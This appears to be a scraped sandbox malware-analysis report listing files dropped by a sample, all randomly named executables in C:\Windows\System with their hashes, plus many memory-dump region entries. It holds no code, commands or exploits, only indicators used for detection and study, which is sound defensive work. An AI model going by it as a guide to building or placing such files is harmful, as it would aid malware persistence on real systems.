89a14f00113c25ca08a1c6845c1ff35edde6a81e8706f491b5589b168231283ae3c2594ff92ee2d2e2a6f1bfa6d675708f47da06ee0b37042540d726d89cb0a5

Download Submit
C:\Windows\System\vFjQqZj.exe

Filesize
1.4MB

MD5
24451d79da9caaee6a611e78e494485a

SHA1
69e812a3488658372327b92f8d0d275f6df92ba9

SHA256
7c99f64d4e24aeb2d45ba1868a93d680fc49a4b7064258aab7b93ad67af52588

SHA512
e427ccd55bbdad2f19350f1e903d198dfe73c0671be2ae0196cfb638879b9c49f383fcbd2aeb50b175559e46d70c3cd5e4c2e5a961b399ff9b8cb9a5f66e295a

Download Submit
C:\Windows\System\vkZDIfp.exe

Filesize
1.4MB

MD5
7409a7d90d179d9aa62e3dfc3edab432

SHA1
21ed60eb018a3fb0576e1beedf0ec920fa86b059

SHA256
a3e67dfb7e472736be7dac3f151fdb55ca4b5ac7d74a58f6db406c284b0e980e

SHA512
14c31ada15e92e3ad06830d9e1d74652bcbf5eefe402e760628cdc5992ae053e8a4a21cd3e59c0b40b507f4e0263e686a966cbe5d18d49f1abf0f71d80dc57a0

Download Submit
C:\Windows\System\xLGneuS.exe

Filesize
1.4MB

MD5
f3b5df1e3918d78643bd89599bc46759

SHA1
cf14a887d5383cf520037a59065eee5d445bf909

SHA256
32b6323541955dd150536f9ba1de8996de50a613b1a865636f97957563720ab4

SHA512
be42f0bfb4b5597434f01d7e8c979cb70ad2f1162c36aa7135d7595f8d94d14a8f185c4534eddd26fdf57d01dae70f131f3fda3586d02b8f3fd5b7fac2a62d23

Download Submit
C:\Windows\System\xLgluEU.exe

Filesize
1.4MB

MD5
af1ff35dbf2d5049f7b9354585092a92

SHA1
a871cf7147081398539c93f30178c9c256bbc2d0

SHA256
1c32986a2dbde0200e7b61f1044c0b966c6926dac288a23296588b21531617a3

SHA512
4f3c51419755b6a45d086916f180472f10358998813e5eaff9fee7f1635dca77ca063d7abea2f80d8dc967bf5374a8f8eddac0982c3ab285dc9e5cf49bf3db08

Download Submit
memory/384-3397-0x00007FF713170000-0x00007FF713562000-memory.dmp

Filesize
3.9MB

Download
memory/384-334-0x00007FF713170000-0x00007FF713562000-memory.dmp

Filesize
3.9MB

Download
memory/628-421-0x00007FF661390000-0x00007FF661782000-memory.dmp

Filesize
3.9MB

Download
memory/628-3399-0x00007FF661390000-0x00007FF661782000-memory.dmp

Filesize
3.9MB

Download
memory/1168-3422-0x00007FF61D9B0000-0x00007FF61DDA2000-memory.dmp

Filesize
3.9MB

Download
memory/1168-574-0x00007FF61D9B0000-0x00007FF61DDA2000-memory.dmp

Filesize
3.9MB

Download
memory/1436-424-0x00007FF708750000-0x00007FF708B42000-memory.dmp

Filesize
3.9MB

Download
memory/1436-3401-0x00007FF708750000-0x00007FF708B42000-memory.dmp

Filesize
3.9MB

Download
memory/1504-3383-0x00007FF68FA70000-0x00007FF68FE62000-memory.dmp

Filesize
3.9MB

Download
memory/1504-42-0x00007FF68FA70000-0x00007FF68FE62000-memory.dmp

Filesize
3.9MB

Download
memory/1752-3395-0x00007FF772970000-0x00007FF772D62000-memory.dmp

Filesize
3.9MB

Download
memory/1752-698-0x00007FF772970000-0x00007FF772D62000-memory.dmp

Filesize
3.9MB

Download
memory/2008-575-0x00007FF744F90000-0x00007FF745382000-memory.dmp

Filesize
3.9MB

Download
memory/2008-3405-0x00007FF744F90000-0x00007FF745382000-memory.dmp

Filesize
3.9MB

Download
memory/2280-3416-0x00007FF655220000-0x00007FF655612000-memory.dmp

Filesize
3.9MB

Download
memory/2280-573-0x00007FF655220000-0x00007FF655612000-memory.dmp

Filesize
3.9MB

Download
memory/2544-3409-0x00007FF754AC0000-0x00007FF754EB2000-memory.dmp

Filesize
3.9MB

Download
memory/2544-568-0x00007FF754AC0000-0x00007FF754EB2000-memory.dmp

Filesize
3.9MB

Download
memory/3016-3370-0x00007FF732BA0000-0x00007FF732F92000-memory.dmp

Filesize
3.9MB

Download
memory/3016-3379-0x00007FF732BA0000-0x00007FF732F92000-memory.dmp

Filesize
3.9MB

Download
memory/3016-39-0x00007FF732BA0000-0x00007FF732F92000-memory.dmp

Filesize
3.9MB

Download
memory/3120-528-0x00007FF686E70000-0x00007FF687262000-memory.dmp

Filesize
3.9MB

Download
memory/3120-3424-0x00007FF686E70000-0x00007FF687262000-memory.dmp

Filesize
3.9MB

Download
memory/3420-3419-0x00007FF68FDD0000-0x00007FF6901C2000-memory.dmp

Filesize
3.9MB

Download
memory/3420-572-0x00007FF68FDD0000-0x00007FF6901C2000-memory.dmp

Filesize
3.9MB

Download
memory/3608-3382-0x00007FF7E1100000-0x00007FF7E14F2000-memory.dmp

Filesize
3.9MB

Download
memory/3608-12-0x00007FF7E1100000-0x00007FF7E14F2000-memory.dmp

Filesize
3.9MB

Download
memory/3608-3369-0x00007FF7E1100000-0x00007FF7E14F2000-memory.dmp

Filesize
3.9MB

Download
memory/3640-203-0x00007FF7CA1F0000-0x00007FF7CA5E2000-memory.dmp

Filesize
3.9MB

Download
memory/3640-3389-0x00007FF7CA1F0000-0x00007FF7CA5E2000-memory.dmp

Filesize
3.9MB

Download
memory/3684-3411-0x00007FF75E5C0000-0x00007FF75E9B2000-memory.dmp

Filesize
3.9MB

Download
memory/3684-569-0x00007FF75E5C0000-0x00007FF75E9B2000-memory.dmp

Filesize
3.9MB

Download
memory/3852-3385-0x00007FF701560000-0x00007FF701952000-memory.dmp

Filesize
3.9MB

Download
memory/3852-51-0x00007FF701560000-0x00007FF701952000-memory.dmp

Filesize
3.9MB

Download
memory/3852-3371-0x00007FF701560000-0x00007FF701952000-memory.dmp

Filesize
3.9MB

Download
memory/3908-285-0x00007FF6E7110000-0x00007FF6E7502000-memory.dmp

Filesize
3.9MB

Download
memory/3908-3407-0x00007FF6E7110000-0x00007FF6E7502000-memory.dmp

Filesize
3.9MB

Download
memory/3984-3388-0x00007FF643920000-0x00007FF643D12000-memory.dmp

Filesize
3.9MB

Download
memory/3984-701-0x00007FF643920000-0x00007FF643D12000-memory.dmp

Filesize
3.9MB

Download
memory/3988-3391-0x00007FF6DD9C0000-0x00007FF6DDDB2000-memory.dmp

Filesize
3.9MB

Download
memory/3988-3372-0x00007FF6DD9C0000-0x00007FF6DDDB2000-memory.dmp

Filesize
3.9MB

Download
memory/3988-77-0x00007FF6DD9C0000-0x00007FF6DDDB2000-memory.dmp

Filesize
3.9MB

Download
memory/4220-0-0x00007FF611C20000-0x00007FF612012000-memory.dmp

Filesize
3.9MB

Download
memory/4220-1-0x00000216BCCA0000-0x00000216BCCB0000-memory.dmp

Filesize
64KB

Download
memory/4276-243-0x00007FF64F3B0000-0x00007FF64F7A2000-memory.dmp

Filesize
3.9MB

Download
memory/4276-3393-0x00007FF64F3B0000-0x00007FF64F7A2000-memory.dmp

Filesize
3.9MB

Download
memory/4432-3468-0x00007FF6E4320000-0x00007FF6E4712000-memory.dmp

Filesize
3.9MB

Download
memory/4432-570-0x00007FF6E4320000-0x00007FF6E4712000-memory.dmp

Filesize
3.9MB

Download
memory/4580-3414-0x00007FF77A320000-0x00007FF77A712000-memory.dmp

Filesize
3.9MB

Download
memory/4580-371-0x00007FF77A320000-0x00007FF77A712000-memory.dmp

Filesize
3.9MB

Download
memory/4704-571-0x00007FF774540000-0x00007FF774932000-memory.dmp

Filesize
3.9MB

Download
memory/4704-3463-0x00007FF774540000-0x00007FF774932000-memory.dmp

Filesize
3.9MB

Download
memory/4708-2210-0x00007FFA45920000-0x00007FFA463E1000-memory.dmp

Filesize
10.8MB

Download
memory/4708-448-0x000001C4666A0000-0x000001C4666C2000-memory.dmp

Filesize
136KB

Download
memory/4708-984-0x00007FFA45920000-0x00007FFA463E1000-memory.dmp

Filesize
10.8MB

Download
memory/4708-81-0x00007FFA45923000-0x00007FFA45925000-memory.dmp

Filesize
8KB

Download
memory/4708-179-0x00007FFA45920000-0x00007FFA463E1000-memory.dmp

Filesize
10.8MB

Download
memory/5020-1002-0x00007FF786FA0000-0x00007FF787392000-memory.dmp

Filesize
3.9MB

Download
memory/5020-3403-0x00007FF786FA0000-0x00007FF787392000-memory.dmp

Filesize
3.9MB

Download